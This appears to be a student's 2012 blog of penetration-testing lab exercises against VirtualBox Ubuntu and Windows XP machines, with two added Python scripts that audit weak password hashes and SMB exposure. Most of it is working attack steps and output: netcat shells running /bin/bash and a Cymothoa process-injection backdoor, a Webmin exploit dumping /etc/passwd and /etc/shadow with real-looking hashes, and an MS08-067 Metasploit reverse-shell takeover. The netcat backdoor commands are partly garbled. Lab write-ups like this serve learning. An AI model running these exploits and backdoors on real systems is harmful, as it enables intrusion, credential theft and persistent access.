Tuesday, January 31, 2012

Backdooring Backtrack to Ubuntu

In this scenario we already have access to the victim and want to set up a backdoor. In a Backtrack terminal, working in the cymothoa directory, I type
nc -l -v -p 8888 -e > cy /bin/bash
at the prompt
root@bt:/pentest/backdoors/cymothoa#
Then I move to the victim's terminal and type
:~$ nc 192.168.56.1 8888 -e > cy /bin/bash
and watch what happens in the Backtrack console.

Backtrack is now listening and has a connection to the victim.
I move to the victim console,
type ls to list the files in this directory, and run the cymothoa binary with ./cymothoa.
With cymothoa running in the victim terminal, I assume the next step is to set up the backdoor from this console; that is my understanding.


Once in cymothoa I type
ps -axu
to see the running processes.

Then I run cymothoa with the syntax
./cymothoa -p (process ID of the bash shell) -s 0 (the shellcode option for a bash shell) -y (the port Backtrack is listening on)
./cymothoa -p 20575 -s 0 -y 8888
The shell process is now infected.

But I am still confused by this situation: is Backtrack infected by Ubuntu, or is Ubuntu infected by Backtrack's Cymothoa?

Crack Password with John The Ripper

After we find the password hashes we need to crack them to recover the real passwords; this time I want to try cracking the passwords from the previous case.

I use John The Ripper.
After opening john, I copied the file named userpass (txt) into john's folder, because an article said this helps with the cracking time, then I ran john against the password file like this
After waiting, cracking the file gave no result, and I thought the list of hashes was too long, so I decided to crack a single hash with john the ripper.
I waited a long time with no result and chose to abort the attempt, because I think this password is not in the dictionary wordlist.

Exploitation to Privilege Escalation

Information Gathering

Zenmap is used to find which services and ports are open or running

MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.021 days (since Mon Jan 30 17:27:33 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=209 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
| NetBIOS computer name:
|_ System time: 2012-01-31 00:58:10 UTC-6

TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.0.21

NSE: Script Post-scanning.
Initiating NSE at 17:58
Completed NSE at 17:58, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.16 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)

From that I suppose a web application is running, so I open that IP in my browser and find a web page, which shows the server is active; I therefore want to penetrate this server through the web.

Vulnerability Assessment and Identification

Then comes the Nessus vulnerability scan,
which gives the level of vulnerability of the target and more details of the running services.
Following up on port 10000, the web application:
the Nessus results state that the Webmin application has a vulnerability.

Exploitation

Metasploit
msf > search webmin

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/webmin/file_disclosure 2006-06-30 normal Webmin file disclosure

msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > set RHOST 192.168.0.21
RHOST => 192.168.0.21
msf auxiliary(file_disclosure) > set LPORT 10000
LPORT => 10000
msf auxiliary(file_disclosure) > set LHOST 192.168.0.27
LHOST => 192.168.0.27
msf auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

After seeing the contents of /etc/passwd I still have not obtained a password and username, so I should try Exploit-DB by searching for the keyword Webmin, which I suspect has a vulnerability.

I tried the exploit from Exploit-DB


root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
Description Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0

WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow

FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

Now I have managed to get in and read the shadow file at /etc/shadow on the target server; the next step is to try to crack the passwords from those hashes.
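Before reaching for a cracker, a defender would first check what the two dumps reveal. This is an added example, not part of the original post: a small Python audit that cross-references the /etc/passwd and /etc/shadow output above and flags accounts that have an interactive shell and only an MD5-crypt ($1$) hash, the combination that makes them cheap targets for John the Ripper in the earlier section. Function and constant names are my own; the sample lines are copied from the dumps above.

```python
# Constructed sample input: lines copied from the passwd and shadow dumps above.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
"""
SHADOW_SAMPLE = """\
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
"""

# crypt(3) prefixes; MD5-crypt is cheap to brute-force, which is why john gets
# through $1$ hashes quickly compared with sha512crypt or yescrypt.
HASH_TYPES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
WEAK_TYPES = {"md5crypt", "empty"}
NON_INTERACTIVE = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}

def hash_type(field):
    """Classify one shadow password field by its crypt(3) prefix."""
    if field == "":
        return "empty"          # no password required at all
    if field[0] in "*!":
        return "locked"         # account cannot authenticate with a password
    for prefix, name in HASH_TYPES.items():
        if field.startswith(prefix):
            return name
    return "unknown"

def audit(passwd_text, shadow_text):
    """Return {user: (shell, hash_type, risky)}; risky means a weak or empty
    hash on an account that can still log in to an interactive shell."""
    shells = {}
    for line in passwd_text.splitlines():
        if line.strip():
            fields = line.split(":")
            shells[fields[0]] = fields[6]
    report = {}
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        user, field = line.split(":")[:2]
        kind = hash_type(field)
        shell = shells.get(user, "?")
        report[user] = (shell, kind, kind in WEAK_TYPES and shell not in NON_INTERACTIVE)
    return report

def risky_accounts(passwd_text, shadow_text):
    """Sorted users that need a password reset or a stronger hash."""
    return sorted(u for u, (_, _, r) in audit(passwd_text, shadow_text).items() if r)
```

Run against the full dumps above, it reports root and every $1$ user account with /bin/bash; the locked system accounts are not flagged.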





Saturday, January 28, 2012

Metasploit With The Systematic Hacking Step

This article is an adjustment of the earlier article about Metasploit.


Information Gathering :


Use Zenmap to identify the specifications of the target.

The scan result is:




Initiating SYN Stealth Scan at 03:28
Scanning 2 hosts [1000 ports/host]
Discovered open port 135/tcp on 192.168.56.102
Discovered open port 139/tcp on 192.168.56.102
Discovered open port 445/tcp on 192.168.56.102
Completed SYN Stealth Scan against 192.168.56.102 in 1.33s (1 host left)
Completed SYN Stealth Scan at 03:28, 8.25s elapsed (2000 total ports)
Initiating Service scan at 03:28
Scanning 3 services on 2 hosts
Completed Service scan at 03:28, 6.01s elapsed (3 services on 2 hosts)
Initiating OS detection (try #1) against 2 hosts
Retrying OS detection (try #2) against 192.168.56.100
NSE: Script scanning 2 hosts.
Initiating NSE at 03:29
Completed NSE at 03:29, 0.02s elapsed
Nmap scan report for 192.168.56.100
Host is up (0.000064s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:D4:42:4C (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.06 ms 192.168.56.100

Nmap scan report for 192.168.56.102
Host is up (0.00055s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5F:41:EC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat:
|   NetBIOS name: XXX-8ADCB030A79, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5f:41:ec (Cadmus Computer Systems)
|   Names
|     XXX-8ADCB030A79<00>  Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     XXX-8ADCB030A79<20>  Flags: <unique><active>
|_    WORKGROUP<1e>        Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.56.102



In the Zenmap result we can see the identification of the target.
The important information is:


Nmap scan report for 192.168.56.102
OS details: Microsoft Windows XP SP2 or SP3

The next step is


Service Enumeration :

The Zenmap result is

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds



We can see the services running on the target system.
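As an added example (not from the original post), here is a small Python triage of the Nmap text report above: it parses the port table and the NSE host-script lines and maps what the scan shows (open SMB ports, SMBv1 only, signing disabled, guest access, Windows XP) to the hardening step each one calls for. Function and rule names are my own; the sample is copied from the 192.168.56.102 report above.

```python
import re

# Constructed sample: lines copied from the Nmap report for 192.168.56.102 above.
NMAP_SAMPLE = """\
Nmap scan report for 192.168.56.102
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
OS details: Microsoft Windows XP SP2 or SP3
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|_  Message signing disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
SMB_PORTS = {139, 445}

def parse_report(text):
    """Return (host, {port: (service, version)} for open ports, NSE/OS note lines)."""
    host, ports, notes = None, {}, []
    for line in text.splitlines():
        m = re.match(r"^Nmap scan report for (\S+)", line)
        p = PORT_RE.match(line)
        if m:
            host = m.group(1)
        elif p and p.group(3) == "open":
            ports[int(p.group(1))] = (p.group(4), p.group(5).strip())
        elif line.startswith("|"):
            notes.append(line.lstrip("|_ ").strip())   # drop the NSE tree prefix
        elif line.startswith("OS details:"):
            notes.append(line)
    return host, ports, notes

# Each weakness the scan can show, paired with the hardening step it calls for.
RULES = [
    (lambda p, n: bool(SMB_PORTS & set(p)), "smb-exposed: restrict 139/445 to trusted networks"),
    (lambda p, n: any("doesn't support SMBv2" in x for x in n), "smbv1-only: host speaks SMBv1 only; patch or isolate"),
    (lambda p, n: any("Message signing disabled" in x for x in n), "smb-signing-off: enforce SMB signing by policy"),
    (lambda p, n: any(x.endswith("smb scripts: guest") for x in n), "guest-smb-access: disable guest/null sessions"),
    (lambda p, n: any("Windows XP" in x for x in n), "legacy-xp: verify MS08-067 and later SMB patches are installed"),
]

def smb_findings(text):
    """Run every rule against one parsed report; returns (host, [finding, ...])."""
    host, ports, notes = parse_report(text)
    return host, [msg for check, msg in RULES if check(ports, notes)]
```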


Next is

Vulnerability Assessment and Identification :

I use Nessus to identify the vulnerabilities of the target.

The Nessus result is:

We can see 2 vulnerabilities were found, and I try to examine them.
I found an interesting vulnerability here, and I want to try to exploit it against the target in Metasploit.


Exploitation :


I use the Metasploit console to exploit the target: open a terminal and type msfconsole

The next step is to match the vulnerability assessment and identification data from Nessus with a module in Metasploit; earlier I found that the most interesting vulnerability is MS08-067.
To get a Meterpreter session through the MS08-067 exploit, use the command
use exploit/windows/smb/ms08_067_netapi
After choosing the exploit we need to set the payload with the command
set PAYLOAD windows/meterpreter/reverse_tcp
and set LHOST and RHOST:
LHOST is my IP
RHOST is the target IP
set LHOST 192.168.56.1 < < My IP
set RHOST 192.168.56.102 < < Target IP
then type exploit to start the exploitation of the target

Once we are in meterpreter mode it means we have opened a hole into the target system with the payload we used; now we need to get into C:\ system32 to fully take over the target system.
Use the syntax

meterpreter > execute -M -f cmd.exe
This command makes the system execute a command prompt on the target (XP), after which we are inside the target's system32.
And finally I succeeded in entering the XP system with Metasploit's meterpreter.

Use the Offline Exploit Database on Exploit-DB

Exploit-DB on Backtrack is an offline arsenal of exploits kept in a local database: Backtrack Tools > Exploitation Tools > Open Source Exploitation > Exploit-DB > Exploit-DB Search
To search for an exploit we can use ./searchsploit <name of exploit>
For example, I want to find out about smb exploits:
./searchsploit smb
I can find many exploits for smb. To use one we need to match the target's vulnerability, found with Nessus (see the Nessus article), to an exploit. To open an exploit, look at its file extension: .py means the file is written in Python and we run it with python <name of exploit>; .rb means a Ruby file; .c means it is written in C and we need to compile the exploit; .pl means it is written in Perl and we run it with perl <name of exploit file>.

We can open an exploit file with the command "cat"
I'll try one of those files as an example
and the result is
That exploit is for VLC media player; we can use it if the target has the matching vulnerability.

Vulnerability Report on Nessus

First I scanned the network in the class, naming the scan test1.
Click on Test1 and press "Browse" and we will see the details of the target scan.

We can see how many vulnerabilities the target has; click on the IP to see more detail.
We can download the detailed result with the option "download report" and choose the type of page to save; I chose "detail HTML report", and the report of that page is in this link: Nessus Report

Metasploit on Backtrack 5

Now I'll try to use the Metasploit console to exploit Windows XP SP3 on VirtualBox. First we need to know information about the victim, known in penetration testing as Information Gathering; we can use nmap, Zenmap, etc. to scan for candidate victims on the network.

Scanning Network
We can see which hosts are active on the network; the target has IP 192.168.56.102. After getting the IP we need to scan the target for vulnerabilities, and here I use Nessus.
After opening Nessus, fill in the Name, Target and Policy fields, and fill Scan Target with the victim's IP.
Press scan and wait for the result to finish.
We can see the victim has 2 high-risk vulnerabilities; click on port 445 to see the detailed information.
I looked at the 2 vulnerabilities and chose the 2nd plugin: I tried to exploit the first option and the exploitation failed, so I chose the 2nd option, which is
the plugin named MS08-067. I searched Google for information about that plugin's vulnerability, found the Metasploit payload description, and tried to exploit it: open the Metasploit console with the terminal command #msfconsole
Use the exploit matching the Nessus result; the syntax in Metasploit is
use exploit/windows/smb/ms08_067_netapi
After choosing the exploit we need to set the payload with the syntax
set PAYLOAD windows/meterpreter/reverse_tcp
After setting the payload we need to set the local host and the target with the syntax
set LHOST 192.168.56.1 < < My IP
set RHOST 192.168.56.102 < < Target IP
and run the exploit with the syntax
exploit
to enter meterpreter mode.

Once we are in meterpreter mode it means we have opened a hole into the target system with the payload we used; now we need to get into C:\ system32 to fully take over the target system.
Use the syntax

meterpreter > execute -M -f cmd.exe
This command makes the system execute a command prompt on the target (XP), after which we are inside the target's system32.
To prove we have taken over the system, we create a folder in C:\
Use the command mkdir is2c at the C:\> prompt to make a folder in C:\
Creating the folder in C:\ succeeded, which means we have taken over the XP system.

 
IS2C © 2012 Blog's Student | is2c